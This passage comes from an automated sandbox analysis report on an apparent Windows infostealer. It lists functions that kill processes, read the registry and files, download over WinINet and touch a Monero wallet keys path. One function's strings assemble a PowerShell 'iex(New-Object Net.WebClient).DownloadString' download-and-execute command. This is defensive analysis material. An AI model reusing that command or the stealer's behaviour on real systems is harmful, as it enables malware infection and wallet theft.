                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000D501A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D5021
                            • InternetOpenA.WININET(000F0DE3,00000000,00000000,00000000,00000000), ref: 000D503A
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000D5061
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 000D5091
                            • InternetCloseHandle.WININET(?), ref: 000D5109
                            • InternetCloseHandle.WININET(?), ref: 000D5116
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 974168c7be0268d03118be9465b626d0589a5aaf03d9b98edbd30d432a0b7c6f
                            • Instruction ID: ac57a5c96f4b6a484b784d8c45ffbcfad0d8f8ccdf8e88518bbd9867c80b80db
                            • Opcode Fuzzy Hash: 974168c7be0268d03118be9465b626d0589a5aaf03d9b98edbd30d432a0b7c6f
                            • Instruction Fuzzy Hash: EE31EAB4A44218ABDB20CF54DC85BDDB7B8EB48305F1085D9FB09A7281D7706EC58F99
                            Function 000E856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E85B6
                            • wsprintfA.USER32 ref: 000E85E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E8629
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • RegQueryValueExA.ADVAPI32(00000000,00D4E200,00000000,000F003F,?,00000400), ref: 000E867C
                            • lstrlen.KERNEL32(?), ref: 000E8691
                            • RegQueryValueExA.ADVAPI32(00000000,00D4E218,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000F0B3C), ref: 000E8729
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E8798
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E87AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: f0e669987734db7023fdcdb4aeb7f785a800106f8bac0722106240487a3e1f2a
                            • Instruction ID: 3b68d1cca83fde93eb15b24936b23de5ccec0bb2e190e8bd39f71fedda32861f
                            • Opcode Fuzzy Hash: f0e669987734db7023fdcdb4aeb7f785a800106f8bac0722106240487a3e1f2a
                            • Instruction Fuzzy Hash: D621E471A1421CAFDB64DB54DC85FE9B3B8FB48700F10C5D8E649A6180DF71AA85CFA4
                            Function 000E99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E99C5
                            • Process32First.KERNEL32(000DA056,00000128), ref: 000E99D9
                            • Process32Next.KERNEL32(000DA056,00000128), ref: 000E99F2
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E9A4E
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E9A6C
                            • CloseHandle.KERNEL32(00000000), ref: 000E9A79
                            • CloseHandle.KERNEL32(000DA056), ref: 000E9A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: f5c4ee9206808cf4af181c3147c6a935c90ba061c4be4dd9b8b6f591dd9c9cc1
                            • Instruction ID: 63373ce689956a672836bb8cbe8ce5d5dc1abf11702f42bf052b7a64f317b4b0
                            • Opcode Fuzzy Hash: f5c4ee9206808cf4af181c3147c6a935c90ba061c4be4dd9b8b6f591dd9c9cc1
                            • Instruction Fuzzy Hash: CC211871900218AFDB65DFA2CC88BEDB7B9BF49300F0441D8E509A7290C7749E84CF91
                            Function 000E7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7834
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E783B
                            • RegOpenKeyExA.ADVAPI32(80000002,00D3C208,00000000,00020119,00000000), ref: 000E786D
                            • RegQueryValueExA.ADVAPI32(00000000,00D4E380,00000000,00000000,?,000000FF), ref: 000E788E
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E7898
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 0c77aa39ff015a9c3243fd70e9f86043940b1a2b23d34b73cb9d985837c9a594
                            • Instruction ID: bc4e5e89d63c47e7e5af0384d77932ebc434686e5f5b492d2c815ea23dfafab2
                            • Opcode Fuzzy Hash: 0c77aa39ff015a9c3243fd70e9f86043940b1a2b23d34b73cb9d985837c9a594
                            • Instruction Fuzzy Hash: D701FF75A48309BFEB10DBE5DD8AF6E77BCEB49700F104494FA09A6291EA749900DB50
                            Function 000E78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E78C4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E78CB
                            • RegOpenKeyExA.ADVAPI32(80000002,00D3C208,00000000,00020119,000E7849), ref: 000E78EB
                            • RegQueryValueExA.ADVAPI32(000E7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 000E790A
                            • RegCloseKey.ADVAPI32(000E7849), ref: 000E7914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: b822da0e217a2fb201ea1cec54dc8ed9d634e451767da7c4b66ff7e54d342775
                            • Instruction ID: afdc9e0e2b1087fbd6a05e5218d2dcaba84ad59f38be3697d0445f30ce8f10a9
                            • Opcode Fuzzy Hash: b822da0e217a2fb201ea1cec54dc8ed9d634e451767da7c4b66ff7e54d342775
                            • Instruction Fuzzy Hash: DB01FFB5A44309BFEB10DBE4DC8AFAEB7BCEB45700F104994F605A6281E7706A008B91
                            Function 000E4300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 000E4325
                            • RegOpenKeyExA.ADVAPI32(80000001,00D4D6A0,00000000,00020119,?), ref: 000E4344
                            • RegQueryValueExA.ADVAPI32(?,00D4E5D8,00000000,00000000,00000000,000000FF), ref: 000E4368
                            • RegCloseKey.ADVAPI32(?), ref: 000E4372
                            • lstrcat.KERNEL32(?,00000000), ref: 000E4397
                            • lstrcat.KERNEL32(?,00D4E590), ref: 000E43AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 70b6aa4ae28df06ae5f7ee6f5db6d7f50f1c59bec6dd26e36e84f30b7e835eb3
                            • Instruction ID: ddc5d95b4a1f88b45906532331ee67ca19de4e036e8fb3cacaff3b6d5983960c
                            • Opcode Fuzzy Hash: 70b6aa4ae28df06ae5f7ee6f5db6d7f50f1c59bec6dd26e36e84f30b7e835eb3
                            • Instruction Fuzzy Hash: CC4199B6900108ABDF25EBE0EC57FEE733CAB89700F044559B71656182EE75578C8BE1
                            Function 000DA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                            • ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                            • LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                            • CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 09c9c0effe9f51e7d30f283f691520089dea3ecbc010a9eab2b80950509d7a14
                            • Instruction ID: 17c807d3cd70bb1de9771fc970416c89a802d9f2785086143e901db533762952
                            • Opcode Fuzzy Hash: 09c9c0effe9f51e7d30f283f691520089dea3ecbc010a9eab2b80950509d7a14
                            • Instruction Fuzzy Hash: 1231C978A04209EFDB14CFA4DC85BEEB7B9AF49314F108159E911A7390D774AA81CFA1
                            Function 000ECB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 1a2e671e149a5bb275ef5fe9a1898959c688b8686646f2931af2e1c38f14977a
                            • Instruction ID: a733c4d4f793b0d88e4dca156a6cbef41ebd881bd93b5a15abc5abcf7feb24bd
                            • Opcode Fuzzy Hash: 1a2e671e149a5bb275ef5fe9a1898959c688b8686646f2931af2e1c38f14977a
                            • Instruction Fuzzy Hash: C14108701007DC5EEB318B25CC85FFB7BE99B45704F2444E8E98AA6183D2729A45DF60
                            Function 000E49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,00D4E488), ref: 000E4A2B
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E4A51
                            • lstrcat.KERNEL32(?,?), ref: 000E4A70
                            • lstrcat.KERNEL32(?,?), ref: 000E4A84
                            • lstrcat.KERNEL32(?,00D3B900), ref: 000E4A97
                            • lstrcat.KERNEL32(?,?), ref: 000E4AAB
                            • lstrcat.KERNEL32(?,00D4D7E0), ref: 000E4ABF
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E8F20: GetFileAttributesA.KERNEL32(00000000,?,000D1B94,?,?,000F577C,?,?,000F0E22), ref: 000E8F2F
                              • Part of subcall function 000E47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E47D0
                              • Part of subcall function 000E47C0: RtlAllocateHeap.NTDLL(00000000), ref: 000E47D7
                              • Part of subcall function 000E47C0: wsprintfA.USER32 ref: 000E47F6
                              • Part of subcall function 000E47C0: FindFirstFileA.KERNEL32(?,?), ref: 000E480D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 37c253b926167b1d343e69f0a1b07d7e0841e74f867db0f939ffd8858ba9f702
                            • Instruction ID: ac67dc96831adf0ddd8a85a70b39be2fef8932a4f126008d618cb053602c65b4
                            • Opcode Fuzzy Hash: 37c253b926167b1d343e69f0a1b07d7e0841e74f867db0f939ffd8858ba9f702
                            • Instruction Fuzzy Hash: B23155B6A00218ABDB15FBB0DC96EDD733CAB59700F404999B249A6052DF74A7C8CF94
                            Function 000E2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E2FD5
                            Strings
                            • <, xrefs: 000E2F89
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 000E2F54
                            • ')", xrefs: 000E2F03
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 000E2F14
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
